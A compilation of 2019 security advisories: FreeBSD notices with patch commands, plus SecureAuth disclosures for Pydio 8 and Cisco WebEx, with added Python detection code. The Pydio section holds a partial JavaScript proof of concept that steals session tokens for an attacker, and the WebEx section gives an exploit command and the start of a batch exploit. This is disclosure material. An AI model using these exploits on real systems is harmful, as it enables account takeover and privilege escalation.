cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

Microcode updates can also be applied while the system is running.  See
cpucontrol(8) for details.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html>.

Mitigation Configuration

Systems with users, processes, or virtual machines in different trust
domains should disable Hyper-Threading by setting the
machdep.hyperthreading_allowed tunable to 0:

# echo machdep.hyperthreading_allowed=0 >> /boot/loader.conf

To activate the MDS mitigation set the hw.mds_disable sysctl.  The settings
are:

0 - mitigation disabled
1 - VERW instruction (microcode) mitigation enabled
2 - Software sequence mitigation enabled (not recommended)
3 - Automatic VERW or Software selection

Automatic mode uses the V
FreeBSD Security Advisory FreeBSD-SA-19:05.pf
=============================================================================
FreeBSD-SA-19:05.pf                                         Security Advisory
                                                          The FreeBSD Project

Topic:          IPv6 fragment reassembly panic in pf(4)

Category:       contrib
Module:         pf
Announced:      2019-05-14
Credits:        Synacktiv
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-01 18:12:05 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:10:21 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-01 18:12:07 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:10:21 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-5597

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD.
In addition to filtering packets, it also has packet normalization
capabilities.

II.  Problem Description

A bug in the pf(4) IPv6 fragment reassembly logic incorrectly uses the last
extension header offset from the last received packet instead of from the
first packet.

III. Impact

Malicious IPv6 packets with different IPv6 extensions could cause a kernel
panic or potentially a filtering rule bypass.

IV.  Workaround

Only systems that use the pf(4) firewall and include packet scrubbing using
the recommended 'scrub all in' or similar are affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r344706
releng/12.0/                                                      r347591
stable/11/                                                        r344707
releng/11.2/                                                      r347591
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://www.synacktiv.com/ressources/Synacktiv_OpenBSD_PacketFilter_CVE-2019-5597_ipv6_frag.pdf>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5597>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:05.pf.asc>
FreeBSD Security Advisory FreeBSD-SA-19:06.pf
=============================================================================
FreeBSD-SA-19:06.pf                                         Security Advisory
                                                          The FreeBSD Project

Topic:          ICMP/ICMP6 packet filter bypass in pf

Category:       contrib
Module:         pf
Announced:      2019-05-14
Credits:        Synacktiv
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-21 14:17:10 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:12:22 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-21 14:17:12 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:12:22 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-5598

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD.
In addition to filtering packets, it also has packet normalization
capabilities.

II.  Problem Description

States in pf(4) let ICMP and ICMP6 packets pass if they have a packet in
their payload matching an existing condition.  pf(4) does not check if the
outer ICMP or ICMP6 packet has the same destination IP as the source IP of
the inner protocol packet.

III. Impact

A maliciously crafted ICMP/ICMP6 packet could bypass the packet filter
rules and be passed to a host that would otherwise be unavailable.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r345377
releng/12.0/                                                      r347593
stable/11/                                                        r345378
releng/11.2/                                                      r347593
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://www.synacktiv.com/posts/systems/icmp-reachable.html>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5598>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:06.pf.asc>
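The outer/inner address comparison that the Problem Description of SA-19:06 reports pf(4) was skipping, as an added example in Python (not FreeBSD, pf(4) or Synacktiv code): it parses constructed IPv4 and IPv6 ICMP error packets and accepts one only when the outer destination address equals the source address of the quoted inner packet. Checksums, IPv6 extension headers and the state-table lookup itself are out of scope; every address and packet below is constructed.

```python
"""Outer/inner address consistency check for ICMP and ICMPv6 error packets.

Added example, not FreeBSD, pf(4) or Synacktiv code.  An ICMP error quotes
the header of the packet that triggered it, so a router can legitimately
deliver that error only to the quoted packet's source.  The check below
compares the outer destination with the quoted inner source; SA-19:06
describes pf(4) matching the quoted packet against its state table without
this comparison.  Checksums are not verified, IPv6 extension headers are
not walked, and all packets here are constructed samples.
"""
import ipaddress
import struct

PROTO_ICMP = 1
PROTO_ICMPV6 = 58
# Error message types that carry the offending packet's header (RFC 792 / RFC 4443).
ICMP4_ERROR_TYPES = {3, 4, 5, 11, 12}  # unreachable, quench, redirect, time exc., param prob.
ICMP6_ERROR_TYPES = {1, 2, 3, 4}       # unreachable, too big, time exc., param prob.


def _ipv4_header(hdr):
    """Return (src, dst, header_length) for an IPv4 header, or raise ValueError."""
    if len(hdr) < 20 or hdr[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (hdr[0] & 0x0F) * 4
    if ihl < 20 or len(hdr) < ihl:
        raise ValueError("truncated IPv4 header")
    return ipaddress.ip_address(hdr[12:16]), ipaddress.ip_address(hdr[16:20]), ihl


def _ipv6_header(hdr):
    """Return (src, dst, header_length) for a fixed IPv6 header, or raise ValueError."""
    if len(hdr) < 40 or hdr[0] >> 4 != 6:
        raise ValueError("not an IPv6 header")
    return ipaddress.ip_address(hdr[8:24]), ipaddress.ip_address(hdr[24:40]), 40


def icmp_error_is_consistent(packet):
    """True only for an ICMP/ICMPv6 error whose quoted inner packet was sent by
    the host the outer packet is addressed to.  Anything else (non-ICMP, echo
    and other non-error types, truncated quotes) returns False."""
    if not packet:
        return False
    try:
        if packet[0] >> 4 == 4:
            _, outer_dst, hlen = _ipv4_header(packet)
            proto, error_types, parse_inner = packet[9], ICMP4_ERROR_TYPES, _ipv4_header
            if proto != PROTO_ICMP:
                return False
        elif packet[0] >> 4 == 6:
            _, outer_dst, hlen = _ipv6_header(packet)
            proto, error_types, parse_inner = packet[6], ICMP6_ERROR_TYPES, _ipv6_header
            if proto != PROTO_ICMPV6:
                return False
        else:
            return False
        icmp = packet[hlen:]
        if len(icmp) < 8 or icmp[0] not in error_types:
            return False
        inner_src, _, _ = parse_inner(icmp[8:])  # 8-byte ICMP header precedes the quote
    except ValueError:
        return False
    return inner_src == outer_dst


def _ipv4(src, dst, proto, payload_len):
    """Constructed IPv4 header with no options; checksum left at zero."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                       ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)


def _ipv6(src, dst, next_header, payload_len):
    """Constructed fixed IPv6 header (version 6, zero traffic class and flow label)."""
    return struct.pack("!IHBB16s16s", 0x60000000, payload_len, next_header, 64,
                       ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)


UDP_QUOTE = struct.pack("!HHHH", 40000, 53, 8, 0)  # first 8 bytes of a UDP header


def build_icmp_unreachable(outer_src, outer_dst, inner_src, inner_dst):
    """IPv4 ICMP type 3 code 3 (port unreachable) quoting an inner IPv4/UDP header."""
    inner = _ipv4(inner_src, inner_dst, 17, len(UDP_QUOTE)) + UDP_QUOTE
    icmp = struct.pack("!BBHI", 3, 3, 0, 0) + inner
    return _ipv4(outer_src, outer_dst, PROTO_ICMP, len(icmp)) + icmp


def build_icmp6_unreachable(outer_src, outer_dst, inner_src, inner_dst):
    """ICMPv6 type 1 code 4 (port unreachable) quoting an inner IPv6/UDP header."""
    inner = _ipv6(inner_src, inner_dst, 17, len(UDP_QUOTE)) + UDP_QUOTE
    icmp = struct.pack("!BBHI", 1, 4, 0, 0) + inner
    return _ipv6(outer_src, outer_dst, PROTO_ICMPV6, len(icmp)) + icmp


if __name__ == "__main__":
    # 10.0.0.1 sent a DNS query to 198.51.100.7; router 203.0.113.1 reports it
    # unreachable back to 10.0.0.1, so outer dst == inner src.
    legit = build_icmp_unreachable("203.0.113.1", "10.0.0.1", "10.0.0.1", "198.51.100.7")
    # Same quoted packet, but the outer packet is addressed to 10.0.0.9, a host
    # that sent nothing: the quote alone would still match 10.0.0.1's state.
    forged = build_icmp_unreachable("203.0.113.1", "10.0.0.9", "10.0.0.1", "198.51.100.7")
    print("legitimate:", icmp_error_is_consistent(legit))   # True
    print("forged:    ", icmp_error_is_consistent(forged))  # False
```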
FreeBSD Security Advisory FreeBSD-SA-19:03.wpa
=============================================================================
FreeBSD-SA-19:03.wpa                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in hostapd and wpa_supplicant

Category:       contrib
Module:         wpa
Announced:      2019-05-14
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-01 01:42:38 UTC (stable/12, 12.0-STABLE)
                2019-05-14 22:57:29 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-01 01:43:17 UTC (stable/11, 11.2-STABLE)
                2019-05-14 22:59:32 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-9494, CVE-2019-9495, CVE-2019-9496, CVE-2019-9497,
                CVE-2019-9498, CVE-2019-9499, CVE-2019-11555

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Wi-Fi Protected Access II (WPA2) is a security protocol developed by the
Wi-Fi Alliance to secure wireless computer networks.  hostapd(8) and
wpa_supplicant(8) are user space daemons, for access points and wireless
clients respectively, that implement the WPA2 protocol.

II.  Problem Description

Multiple vulnerabilities exist in the hostapd(8) and wpa_supplicant(8)
implementations.  For more details, please see the reference URLs in the
References section below.

III. Impact

Security of the wireless network may be compromised.  For more details,
please see the reference URLs in the References section below.

IV.  Workaround

No workaround is available, but systems not using hostapd(8) or
wpa_supplicant(8) are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterwards, restart hostapd(8) or wpa_supplicant(8).

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart hostapd(8) or wpa_supplicant(8).

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch.asc
# gpg --verify wpa-12.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch.asc
# gpg --verify wpa-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r346980
releng/12.0/                                                      r347587
stable/11/                                                        r346981
releng/11.2/                                                      r347588
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://w1.fi/security/2019-1>
<URL:https://w1.fi/security/2019-2>
<URL:https://w1.fi/security/2019-3>
<URL:https://w1.fi/security/2019-4>
<URL:https://w1.fi/security/2019-5>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9494>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9495>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9496>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9497>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9498>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9499>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11555>

The latest revision of this advis
FreeBSD Security Advisory FreeBSD-SA-19:04.ntp
=============================================================================
FreeBSD-SA-19:04.ntp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Authenticated denial of service in ntpd

Category:       contrib
Module:         ntp
Announced:      2019-05-14
Credits:        Magnus Stubman
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-07 13:45:36 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:02:56 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-07 13:45:36 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:06:26 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-8936

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP)
used to synchronize the time of a computer system to a reference time
source.

The ntpd(8) daemon uses a protocol called mode 6 to both get status
information from the running ntpd(8) daemon and configure it on the fly.
This protocol is typically used by the ntpq(8) program, among others.

II.  Problem Description

A crafted malicious authenticated mode 6 packet from a permitted network
address can trigger a NULL pointer dereference.

Note that for this attack to work, the sending system must be on an address
from which the target ntpd(8) accepts mode 6 packets, and must use a
private key that is specifically listed as being used for mode 6
authorization.

III. Impact

The ntpd daemon can crash due to the NULL pointer dereference, causing a
denial of service.

IV.  Workaround

Use 'restrict noquery' in the ntpd configuration to limit addresses that
can send mode 6 queries.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart the ntpd service:

# service ntpd restart

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch.asc
# gpg --verify ntp.patch.asc

[FreeBSD 11.2-RELEASE/11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch.asc
# gpg --verify ntp-11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the ntpd service, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r344884
releng/12.0/                                                      r347589
stable/11/                                                        r344884
releng/11.2/                                                      r347590
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:http://support.ntp.org/bin/view/Main/SecurityNotice#March_2019_ntp_4_2_8p13_NTP_Rele>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:04.ntp.asc>
[SAUTH-2019-0002] - Pydio 8 Multiple Vulnerabilities
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Pydio 8 Multiple Vulnerabilities

1. *Advisory Information*

Title: Pydio 8 Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0002
Advisory URL: https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities
Date published: 2019-03-28
Date of last update: 2019-03-28
Vendors contacted: Pydio
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Argument Injection or Modification [CWE-88], Argument Injection or
Modification [CWE-88], Information Exposure [CWE-200], Improper
Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[CWE-79], Information Exposure [CWE-200], Information Exposure [CWE-200]
Impact: Code execution, Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,
CVE-2019-10046, CVE-2019-10046

3. *Vulnerability Description*

Pydio [1] website states that:

   ...Pydio, an open source EFSS (Enterprise File Synchronization and
   Sharing) solution that can be deployed On-Premise or in a Hybrid /
   Cloud environment. Pydio is available either through a Community
   distribution (Ideal for home use) that is free forever or an
   Enterprise which provides all the features, support and compliance
   to secure file sharing. Pydio is sold in more than 25 countries,
   from Cupertino to Singapore, and is used by leading brands around
   the world, such as Nikon, Credit Agricole, Dexia... Pydio also
   serves education and government clients, with major references such
   as Cambridge University (UK) and ADEME (France).
Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2). An
attacker with regular user access to the application who tricks an
administrator into opening a shared URL bookmark through the application
can obtain the victim's session identifiers, impersonate him/her, and
perform actions such as creating a new administrator user account. After
gaining privileged access to the application, the attacker can leverage
another vulnerability to perform OS command injection under the privileges
of the user account running the web server.

4. *Vulnerable Packages*

   . Pydio 8.2.2 - Latest version at the time of testing.
   . Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Pydio published v8.2.3 that fixes all the reported vulnerabilities.

6. *Credits*

These vulnerabilities were discovered and researched by Ramiro Molina
from SecureAuth Security Consulting Services. The publication of this
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories
Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege escalation vector based in multiple vulnerabilities*
[CVE-2019-10049]

By chaining vulnerabilities it is possible for an attacker with regular
user access to the web application to trick an administrator user into
opening a link shared through the application, which in turn opens a
shared file containing JavaScript code that is executed in the context of
the victim user to obtain sensitive information such as session
identifiers (session cookie and secure token) and perform actions on
behalf of him/her.

Note: if the targeted users are not administrators, any other action on
behalf of that user could also be achieved, for example to obtain
sensitive files stored in their accounts or impersonate them.

Attack vector steps:

1. Authenticated in the web application with a regular user account, go
   to "My Files" and upload a file named, for example, pydio_xss.html
   (use the .html extension) with the following content. The PoC, once
   executed, performs several requests to:

   . Obtain a "secure_token" for the user, which is a CSRF prevention
     token.
   . Obtain the session cookie for the current user.
   . Send the two sensitive tokens to the attacker, which allows
     impersonating the victim user.
   . Change the "context to configuration".
   . Create a new user account named "admin99" with password "password1".
   . Change the user role of the created user to administrator.

   Note: change the IP address and port number (the example ones are the
   IP 192.168.56.1 and port ).

PoC pydio_xss.html file:

/-----
console.log("Starting...");

var req0 = new XMLHttpRequest();
req0.open('GET', "/welcome/", true);
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
req0.send();
req0.onload = function() {
    var res = req0.responseText.match(/SECURE_TOKEN.*?,/)[0];
    var secure_token = res.split(/"/)[2] ;

    var req1 = new XMLHttpRequest();
    req1.open('POST', "index.php", true);
    req1.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    req1.send("get_action=get_sess_id&secure_token=" + secure_token);
    req1.onlo
[CORE-2018-0012] - Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

1. *Advisory Information*

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
Advisory ID: CORE-2018-0012
Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
Date published: 2019-02-27
Date of last update: 2019-02-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2019-1674

3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

   Cisco Webex Meetings: Simply the Best Video Conferencing and Online
   Meetings. With Cisco Webex Meetings, joining is a breeze, audio and
   video are clear, and screen sharing is easier than ever. We help you
   forget about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop App
for Windows could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

   . Cisco Webex Meetings Desktop App v33.6.4.15
   . Cisco Webex Meetings Desktop App v33.6.5.2
   . Cisco Webex Meetings Desktop App v33.7.0.694
   . Cisco Webex Meetings Desktop App v33.7.1.15
   . Cisco Webex Meetings Desktop App v33.7.2.24
   . Cisco Webex Meetings Desktop App v33.7.3.7
   . Cisco Webex Meetings Desktop App v33.8.0.779
   . Cisco Webex Meetings Desktop App v33.8.1.13
   . Cisco Webex Meetings Desktop App v33.8.2.7
   . Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Cisco informed us that the vulnerability is fixed in Cisco Webex Meetings
Desktop App releases 33.6.6 and 33.9.1. In addition, Cisco published the
following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation* [CVE-2019-1674]

The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate version numbers of new files. An unprivileged local
attacker could exploit this vulnerability by invoking the update service
command with a crafted argument and folder. This will allow the attacker
to run arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying the atgpcdec.dll binary to a
local attacker-controlled folder and renaming it atgpcdec.7z. Then, a
previous version of the ptUpdate.exe file must be compressed as 7z and
copied to the controlled folder. Also, a malicious dll must be placed in
the same folder, named vcruntime140.dll and compressed as vcruntime140.7z.
Finally, a ptUpdate.xml file must be provided in the controlled folder for
the update binary (ptUpdate.exe) to treat our files as a normal update.

To gain privileges, the attacker must start the service with the command
line:

sc start webexservice WebexService 1 989898 "attacker-controlled-path"

Proof of Concept:

The following proof of concept performs a 2 step attack, since starting
from version 33.8.X, the application enforces the checking of signatures
for all the downloaded binaries. This 2 step attack works against all the
mentioned vulnerable packages. Notice that you'll need the previous
versions of the ptUpdate.exe executable. Those versions are:
3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last
step. To exploit versions prior to 33.8.X, only one step is required (the
last step in this PoC).
Batch file: /- @echo off REM Contents of PoC.bat REM REM This batch file will exploit CVE-2019-1674 REM REM First, it will copy the atgpcdec.dll file from the installation REM folder to the current folder as atgpcdec.7z. Then, it will backup REM ptUpdate.exe and vcruntime140.dll files from the installation folder REM in the current folder, adding .bak to their names. Keep in mind that REM those files will be replaced (especially, vcruntime140.dll) and if REM not restored, will render the application useless. REM REM The executable ptUpdate.exe version 3307.1.1811.1500 must be REM compressed as ptUpdate0.7z and present in the current folder. REM The executable ptUpdate.exe version 3306.4.1811.1600 must be REM compressed as ptUpdate1.7z and present in the current folder. REM Both can be generated using 7zip GUI and compressing as 7z, with REM normal compression level and LZMA compression method. REM Another way is to compress both files using the command line app: REM REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21 REM REM ptUpdate0.xml file will be used in the first stage of the atta
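The trigger above is a plain `sc start webexservice ... "<folder>"` command line, which makes it easy to hunt for in process-creation telemetry. The following detection logic is an added example by the editor, not part of the SecureAuth advisory: it flags WebexService start commands whose folder argument lies outside the application's install tree. The trusted install prefixes and the sample event records are assumptions constructed for the demonstration; adjust them to the deployment.

```python
"""Flag WebexService start commands that point the updater at a folder
outside the application's install tree, over process-creation records."""
import re
import shlex

# Assumed install locations for this example; adjust to the deployment.
TRUSTED_PREFIXES = (
    "c:\\program files (x86)\\webex\\",
    "c:\\program files\\webex\\",
)

# The advisory's trigger: sc start webexservice WebexService 1 989898 "<folder>"
SC_START = re.compile(
    r"^\s*(?:\S*\\)?sc(?:\.exe)?\s+start\s+webexservice\b", re.IGNORECASE)


def normalize(path: str) -> str:
    """Strip quotes, unify separators and case so prefix checks are stable."""
    return path.strip('"').replace("/", "\\").lower()


def suspicious_update_path(cmdline: str):
    """Return the offending folder argument, or None if the line is benign."""
    if not SC_START.match(cmdline):
        return None
    try:
        # posix=False keeps Windows quoting and treats backslashes literally.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        return cmdline          # unparseable command line: surface it anyway
    for arg in argv[3:]:        # everything after 'sc start webexservice'
        p = normalize(arg)
        if ("\\" in p or ":" in p) and not p.startswith(TRUSTED_PREFIXES):
            return arg.strip('"')
    return None


def scan(events):
    """events: iterable of dicts with 'user' and 'cmdline'. Returns (user, path) hits."""
    hits = []
    for ev in events:
        path = suspicious_update_path(ev["cmdline"])
        if path is not None:
            hits.append((ev["user"], path))
    return hits


# Constructed sample records in the shape of Sysmon / 4688 command-line fields.
SAMPLE_EVENTS = [
    {"user": "CORP\\bob",
     "cmdline": 'sc start webexservice WebexService 1 989898 "C:\\Users\\bob\\AppData\\Local\\Temp\\upd"'},
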